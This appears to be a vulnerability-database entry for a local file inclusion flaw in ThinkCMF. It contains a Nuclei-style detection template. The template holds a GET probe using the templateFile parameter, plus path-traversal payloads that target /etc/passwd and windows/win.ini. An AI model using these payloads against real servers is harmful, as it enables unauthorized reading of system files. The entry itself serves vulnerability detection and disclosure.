thinkcmf-lfi: ThinkCMF - Local File Inclusion

日期: 2025-08-01 | 影响软件: ThinkCMF | POC: 已公开

漏洞描述

ThinkCMF is vulnerable to local file inclusion.

PoC代码[已公开]

id: thinkcmf-lfi

info:
  name: ThinkCMF - Local File Inclusion
  author: pikpikcu
  severity: high
  description: ThinkCMF is vulnerable to local file inclusion.
  reference:
    - https://www.freebuf.com/vuls/217586.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
    win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
    unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
  tags: thinkcmf,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?a=display&templateFile=README.md"

    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "ThinkCMF"
          - "## README"
          - "## UPDATE"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221009ca2fec18564ab3196e63b32c4b1b85462c597c8409f2d5695b356baf2e036c4022100e7d1e07d53e6c4ad906d140a2ddbe6ec89504c261c3eef20b49da6e8195fe756:922c64590222798bb761d5b6d8e72950

相关漏洞推荐